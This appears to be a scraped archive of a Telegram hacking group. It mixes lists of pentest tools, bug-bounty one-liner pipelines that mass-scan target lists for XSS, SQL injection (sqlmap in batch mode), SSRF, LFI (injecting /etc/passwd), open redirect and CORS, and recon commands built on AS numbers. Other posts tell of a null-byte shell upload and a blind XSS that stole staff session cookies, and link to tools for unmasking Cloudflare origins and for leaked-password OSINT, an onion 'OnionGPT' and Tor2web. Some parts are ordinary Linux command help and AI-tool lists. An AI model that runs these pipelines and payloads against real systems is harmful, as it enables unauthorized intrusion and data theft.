Termux All Command [Telegram Group]
Відкрити в Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Показати більше1 328
Підписники
+524 години
+177 днів
+5730 день
Архів дописів
🔊 100 tools every Web Pentester must know
Burp Suite
OWASP ZAP
Metasploit Framework
sqlmap
Nmap
Dirbuster
WPScan
Arachni
BeEF
Hydra
XSSer
Sqlninja
Cain and Abel
Netcat
THC Hydra
Nikto
Skipfish
Vega
sqlsus
John the Ripper
THC-SSL-DOS
Sublist3r
Wfuzz
Shodan
Fiddler
sqlmapgui
Wapiti
Yersinia
Tamper Data
WebScarab
Paros
SQL Inject Me
Acunetix
Nessus
Grendel-Scan
Ratproxy
IronWASP
Websecurify
Zed Attack Proxy
Zenmap
NoSQLMap
ODAT
X-Forwarded-For Spoofer
WebSlayer
w3af
Maltego
WPScan Desktop
WP-Scan Vulnerability Database
BruteForcer
JoomScan
Joomfish Scanner
WP Security Audit Log
JoomlaScan
CMSmap
Vega Vulnerability Scanner
Skipfish Web Application Security Scanner
Grabber
DAVScan
bbqsql
Scrawlr
Cewl
Wapiti Web Application Vulnerability Scanner
XssPy
RIPS
Zenmap
WPScan
Arachni
OWASP ZAP
Sqlmap
Nessus
Kali Linux
Acunetix Web Vulnerability Scanner
Nmap
Vega
Metasploit Framework
Hydra
Burp Suite
Nikto
Zed Attack Proxy
Grendel-Scan
Skipfish
Arachni
Wfuzz
Dirbuster
Sqlninja
NoSQLMap
OWASP Mantra
WP-Scanner
XSSer
Metagoofil
Brutus
RainbowCrack
THC-Hydra
Medusa
THC-SSL-DOS
OpenVAS
WP-Scan Vulnerability Database
WPScan Desktop
LFI Suite
XssPy
━━━━━━━━━━━━━━━
👨💻 BUG BOUNTY WITH ONE-LINE BASH SCRIPTS 🕵️
𝐗𝐒𝐒 ⪼
cat targets.txt | anew | httpx -silent -threads 500 | xargs -I@ dalfox url @
cat targets.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
𝐒𝐐𝐋𝐢 ⪼
httpx -l targets.txt -silent -threads 1000 | xargs -I@ sh -c 'findomain -t @ -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent --level 1'
𝐒𝐒𝐑𝐅 ⪼
findomain -t http://target.com -q | httpx -silent -threads 1000 | gau | grep "=" | qsreplace 𝘩𝘵𝘵𝘱://𝘠𝘖𝘜𝘙.𝘣𝘶𝘳𝘱𝘤𝘰𝘭𝘭𝘢𝘣𝘰𝘳𝘢𝘵𝘰𝘳.𝘯𝘦𝘵
𝐋𝐅𝐈 ⪼
gau http://vuln.target.com | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
𝐎𝐏𝐄𝐍 𝐑𝐄𝐃𝐈𝐑𝐄𝐂𝐓 ⪼
gau http://vuln.target.com | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
𝐏𝐑𝐎𝐓𝐎𝐓𝐘𝐏𝐄 𝐏𝐎𝐋𝐋𝐔𝐓𝐈𝐎𝐍 ⪼
subfinder -d http://target.com | httpx -silent | sed 's/$/\/?proto[testparam]=exploit\//' | page-fetch -j 'window.testparam=="exploit"?"[VULN]":"[NOT]"' | sed "s/(//g"|sed"s/)//g" | sed "s/JS//g" | grep "VULN"
𝐂𝐎𝐑𝐒 ⪼
gau http://vuln.target.com | while read url;do target=$(curl -s -I -H "Origin: https://evvil.com" -X GET $url) | if grep 'https://evvil.com'; then [Potentional CORS Found]echo $url;else echo Nothing on "$url";fi;done
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 .𝐣𝐬 ⪼
echo http://target.com | haktrails subdomains | httpx -silent | getJS --complete | tojson | anew JS1
assetfinder http://vuln.target.com | waybackurls | grep -E "\.json(?:onp?)?$" | anew
𝐄𝐱𝐭𝐫𝐚𝐜𝐭 𝐔𝐑𝐋𝐬 𝐟𝐫𝐨𝐦 𝐜𝐨𝐦𝐦𝐞𝐧𝐭 ⪼
cat targets.txt | html-tool comments | grep -oE '\b(https?|http)://[-A-Za-z0-9+&@#/%?=~_|!:,.;]*[-A-Za-z0-9+&@#/%=~_|]'
𝐃𝐮𝐦𝐩 𝐈𝐧-𝐬𝐜𝐨𝐩𝐞 𝐀𝐬𝐬𝐞𝐭𝐬 𝐟𝐫𝐨𝐦 𝐇𝐚𝐜𝐤𝐞𝐫𝐎𝐧𝐞 ⪼
curl -sL 𝘩𝘵𝘵𝘱𝘴://𝘨𝘪𝘵𝘩𝘶𝘣.𝘤𝘰𝘮/𝘢𝘳𝘬𝘢𝘥𝘪𝘺𝘵/𝘣𝘰𝘶𝘯𝘵𝘺-𝘵𝘢𝘳𝘨𝘦𝘵𝘴-𝘥𝘢𝘵𝘢/𝘣𝘭𝘰𝘣/𝘮𝘢𝘴𝘵𝘦𝘳/𝘥𝘢𝘵𝘢/𝘩𝘢𝘤𝘬𝘦𝘳𝘰𝘯𝘦_𝘥𝘢𝘵𝘢.𝘫𝘴𝘰𝘯?𝘳𝘢𝘸=𝘵𝘳𝘶𝘦 | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type]
𝐅𝐢𝐧𝐝 𝐥𝐢𝐯𝐞 𝐡𝐨𝐬𝐭/𝐝𝐨𝐦𝐚𝐢𝐧/𝐚𝐬𝐬𝐞𝐭𝐬 ⪼
subfinder -d http://vuln.target.com -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u
𝐒𝐜𝐫𝐞𝐞𝐧𝐬𝐡𝐨𝐭 ⪼
assetfinder -subs-only http://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
🚨 Essential Mind Maps for Bug Hunters!
Boost your bug bounty skills with Mind-Maps Repository by Imran Parray.
Topics include:
Bug Hunting Methodology
2FA & OAuth Testing
SSRF, Server-side Issues, and more!
🔗 Explore here: https://lnkd.in/g-_jwEGM
Subdosec - Subdomain takeover scanner
CLI : https://lnkd.in/gmW-nth3
Web Based : https://lnkd.in/gxn2AmHA
OSINT tool for searching people's digital footprint and leaked passwords across various social networks, written in Go. : https://github.com/ibnaleem/gosearch
🚀 LINUX BASIC COMMANDS 🚨
File and Directory Management:
1. ls: List files and directories.
2. cd: Change directory.
3. pwd: Display the current directory.
4. mkdir: Create a new directory.
5. rm: Remove files or directories.
6. cp: Copy files or directories.
7. mv: Move or rename files.
8. touch: Create an empty file.
9. tree: Display directory structure.
File Viewing and Editing:
10. cat: Display file content.
11. less / more: View files page by page.
12. head: Show the first 10 lines.
13. tail: Show the last 10 lines.
14. nano: A simple text editor.
15. vi / vim: An advanced text editor.
Search Operations:
16. find: Locate files and directories.
17. grep: Search within files.
18. locate: Quickly find files using a database.
19. which: Locate a command’s path.
Disk and File System Management:
20. df: Display disk space usage.
21. du: Show directory or file size.
22. mount / umount: Mount or unmount file systems.
23. lsblk: List all block devices.
24. fsck: Check and repair file systems.
Process and System Monitoring:
25. ps: Display running processes.
26. top: Monitor system processes.
27. htop: Interactive process manager.
28. kill: Terminate a process.
29. uptime: Show system uptime.
30. free: Check memory usage.
Networking Commands:
31. ping: Check connectivity.
32. curl: Transfer data to/from servers.
33. wget: Download files from the internet.
34. ifconfig / ip: View or configure network interfaces.
35. netstat: Show network statistics.
36. ssh: Remote access to servers.
37. SCP: Securely Copy Files Between Systems
Permissions and Ownership:
38. chmod: Modify file permissions
39. chown: Change file owner/group
40. umask: Set default permissions
Archiving and Compression:
41. tar: Archive and compress files
42. gzip/gunzip: Compress and decompress files
43. zip/unzip: Handle zip files
System Information:
44. uname -a: Show system information
45. hostname: Display system hostname
46. whoami: Current user
47. id: Show user and group IDs
48. dmesg: Kernel log messages
49. lscpu: CPU architecture information
50. lsusb: List USB devices
51. lspci: Show PCI devices
hashtag#linux
hashtag#commands
hashtag#serversupport
hashtag#supportexecutive
hashtag#monitoring
Finally, let's run sqlmap on all identified potentially vulnerable URLs.
findomain -t testphp.vulnweb.com -q | httpx -silent | anew | waybackurls | gf sqli >> sqli ; sqlmap -m sqli --batch --random-agent
hashtag#web hashtag#sqli
now its become so easy for making notes from any youtube video just type study.lol/ in front of any youtube video like study.lol/https://youtubevideolink it will give u all video summary and amazing question answer in flashcards try it(not a promo i just found it yesterday and found it useful)
🛠️ 20 Very Advanced Information Gathering Tools 🛠️
1. Nmap
➤ Network Scanner
🔗 github.com/nmap/nmap
2. Maltego
➤ Visual Link Analysis
🔗 maltego.com
3. Shodan
➤ IoT Search Engine
🔗 github.com/m4ll0k/Shodanfy.py
4. Recon-ng
➤ Web Reconnaissance Framework
🔗 github.com/lanmaster53/recon-ng
5. Spiderfoot
➤ OSINT Automation Tool
🔗 github.com/smicallef/spiderfoot
6. theHarvester
➤ Email and Subdomain Gatherer
🔗 github.com/laramies/theHarvester
7. Amass
➤ Network Mapping of Attack Surfaces
🔗 github.com/OWASP/Amass
8. RED HAWK
➤ All-In-One Scanning Tool
🔗 github.com/Tuhinshubhra/RED_HAWK
9. ReconSpider
➤ Multi-purpose Gathering Tool
🔗 github.com/bhavsec/reconspider
10. OSINT Framework
➤ Comprehensive Information Gathering Collection
🔗 github.com/lockfale/OSINT-Framework
11. Infoga
➤ Email OSINT Gatherer
🔗 github.com/m4ll0k/Infoga
12. Striker
➤ Offensive Information Gathering Tool
🔗 github.com/s0md3v/Striker
13. SecretFinder
➤ API Key and Secret Finder
🔗 github.com/m4ll0k/SecretFinder
14. Xerosploit
➤ Penetration Testing Toolkit
🔗 github.com/LionSec/xerosploit
15. FOCA
➤ Metadata Analyzer
🔗 github.com/ElevenPaths/FOCA
16. ReconDog
➤ Reconnaissance Swiss Army Knife
🔗 github.com/s0md3v/ReconDog
17. Metagoofil
➤ Metadata Extractor
🔗 github.com/laramies/metagoofil
18. Dracnmap
➤ Nmap Script Wrapper
🔗 github.com/Screetsec/Dracnmap
19. Rang3r
➤ Multi-threaded Port Scanner
🔗 github.com/floriankunushevci/rang3r
20. Breacher
➤ Admin Panel Finder
🔗 github.com/s0md3v/Breacher
🚀 Stay tuned for more advanced tools & guides
🔔 Follow us for daily updates on cybersecurity
👥 Join our channel for more insights!
https://t.me/teammatrixs
Website Security
Urlscan.io - URL and website scanner
→https://urlscan.io/
VirusTotal URL Search
VirusTotal
→https://www.virustotal.com/gui/home/url
Threat Intelligence Platform
→https://threatintelligenceplatform.com/
Is This Website Safe
→https://safeweb.norton.com/
Safe Browsing site status
→https://transparencyreport.google.com/safe-browsing/search?hl=en
WHOIS IP Lookup Tool
→https://www.ultratools.com/tools/ipWhoisLookupResult
Find Website IP Address
→https://www.ipvoid.com/find-website-ip/
IP Address Blacklist Check
→https://www.ipvoid.com/ip-blacklist-check/
Check The Website’s SSL Certificate
See Your Entire Attack Surface in Real-Time. Get a current view of all of your organization's assets so you can proactively prevent targeted attacks and investigate suspicious activity.
→https://censys.io/ipv4
SpiderFoot
→https://www.spiderfoot.net/
Tools for Looking up Malicious Websites
→https://zeltser.com/lookup-malicious-websites/
How to Tell if a Website is Dangerous
→https://www.secjuice.com/how-to-tell-if-a-website-is-dangerous/
Malicious URL Scanner
→https://www.ipqualityscore.com/threat-feeds/malicious-url-scanner
Threatlog - Malicious Domains Database
Database of malicious domains, fraudulent and phishing domains, malware domains database, threat intelligence feeds, detect potentially malicious domains.
→https://www.threatlog.com/
Opswat - MetaDefender Cloud
Cloud-based Deep CDR, Multiscanning, Sandbox Dynamic Analysis, Hash and IP-Domain reputation with options for personal and commercial users.
→https://metadefender.opswat.com/
Tools for searching emails for a specific domain:
https://lnkd.in/dNRbh9dh
https://lnkd.in/dUS7g_Xc
https://lnkd.in/dx-dgVRB
https://www.infoga.io/
https://findemail.io/
https://lnkd.in/djBBAa6j
https://lnkd.in/daVsYTts
https://minelead.io/
Discovered Information Disclosure Vulnerability via Directory and File Disclosure 🔍
~Tip: Add the file
/unstable/ to your wordlist, and you might discover some juicy data. 💡
Enjoy! 🚀[Red Team] Recon Techniques #1: Expanding the Attack Surface Using AS Numbers
If a company or organization has its own AS number (Autonomous System Number), we can leverage it to gather further information about IP blocks, domains, and services associated with the target organization, this technique is highly useful in the information-gathering phase to expand the attack surface.
Identifying IP blocks associated with the AS number:
$ whois -h whois.radb.net -- "-i origin $ASN" | awk '/^route:/ {print $2}' | sort -u > ip-block.txt
Scanning the status of active hosts from the IP block list:
$ nmap -sn -PS -iL ip-block.txt -v -oG ips.txt
Retrieving a list of responsive active IPs:
$ cat ips.txt | grep -i up | grep -oP '(?<=Host: )\S+' | httpx -silent
Using this technique, we can identify active and relevant services, which can then be explored further to uncover potential vulnerabilities in the identified hosts.
I found LFI Vulnerability via an Image Upload Page🎯
How I did it :
First, I used Subfinder to gather all subdomains (Tip: Always configure your API keys for the best results).
Then I used the httpx-toolkit tool to collect all alive subdomains into one file.
After that, I ran ffuf with my custom wordlist on the file.
I found an image upload page during fuzzing.
I wrote a shell script and uploaded it. To bypass the filter, I used a null-byte trick:
For example, renaming shell.hs to shell.hs%00.png (adding %00.png after shell.hs)
Finally, I discovered the LFI vulnerability
Another Bug Bounty Story -
🚨 Blind XSS Escalation: From Bio to Breach:
What started as a simple HTML injection vulnerability in the profile bio page escalated into a high-impact Blind XSS attack when a staff member viewed the profile in their internal system.
✅ Impact:
The payload executed in the staff panel, exposing sensitive session data like cookies, IP addresses, and full DOM access. This allowed me to capture an image of the staff panel and craft specific payloads to navigate and interact with internal systems dynamically—uncovering critical weaknesses within their infrastructure.
🎯 Recommended tools for BXSS hunters:
Online tools:
bxsshunter - https://bxsshunter.com/
Link: https[:]//bxsshunter[.]com/
bughunter - https://lnkd.in/ddUfmQx8
Link: https[:]//xss[.]bughunter[.]app/dashboard/payload
xss0r - https://xss0r.com/
Link: https[:]//xss0r[.]com
Github tool:
xsshunter - https://lnkd.in/d5jmgkhw
Link: https[:]//github[.]com/trufflesecurity/xsshunter
CloakQuest3r
CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit.
TOOL GITHUB LINK: https://lnkd.in/dvNMPuge
💡OnionGPT - Have fun! 😁
http://oniongpt6lntsoztgylhju7nmqedlq6fjexe55z327lmxyae3nutlyad[.]onion/
3 Ways to Install Packages in Kali Linux | @TechBolt27 : https://www.youtube.com/watch?v=stRLqy5ARFI
Access onion sites online without Tor browser:
https://tor2web.activetk.jp/
100 AI Tools to replace your tedious work:
1. Research
- ChatGPT
- YouChat
- Abacus
- Perplexity
- Copilot
- Gemini
2. Image
- Fotor
- Stability AI
- Midjourney
- Microsoft Designer
3. CopyWriting
- Rytr
- Copy AI
- Writesonic
- Adcreative AI
4. Writing
- Jasper
- HIX AI
- Jenny AI
- Textblaze
- Quillbot
5. Website
- 10Web
- Durable
- Framer
- Style AI
6. Video
- Klap
- Opus
- Eightify
- InVideo
- HeyGen
- Runway
- ImgCreator AI
- Morphstudio .xyz
7. Meeting
- Tldv
- Otter
- Noty AI
- Fireflies
8. SEO
- VidIQ
- Seona AI
- BlogSEO
- Keywrds ai
9. Chatbot
- Droxy
- Chatbase
- Mutual info
- Chatsimple
10. Presentation
- Decktopus
- Slides AI
- Gamma AI
- Designs AI
- Beautiful AI
11. Automation
- Make
- Zapier
- Xembly
- Bardeen
12. Prompts
- FlowGPT
- Alicent AI
- PromptBox
- Promptbase
- Snack Prompt
13. UI/UX
- Figma
- Uizard
- UiMagic
- Photoshop
14. Design
- Canva
- Flair AI
- Designify
- Clipdrop
- Autodraw
- Magician design
15. Logo Generator
- Looka
- Designs AI
- Brandmark
- Stockimg AI
- Namecheap
16. Audio
- Lovo ai
- Eleven labs
- Songburst AI
- Adobe Podcast
17. Marketing
- Pencil
- Ai-Ads
- AdCopy
- Simplified
- AdCreative
18. Startup
- Tome
- Ideas AI
- Namelix
- Pitchgrade
- Validator AI
19. Productivity
- Merlin
- Tinywow
- Notion AI
- Adobe Sensei
- Personal AI
20. Social media management
- Tapilo
- Typefully
- Hypefury
- TweetHunter
https://techtheworld.net
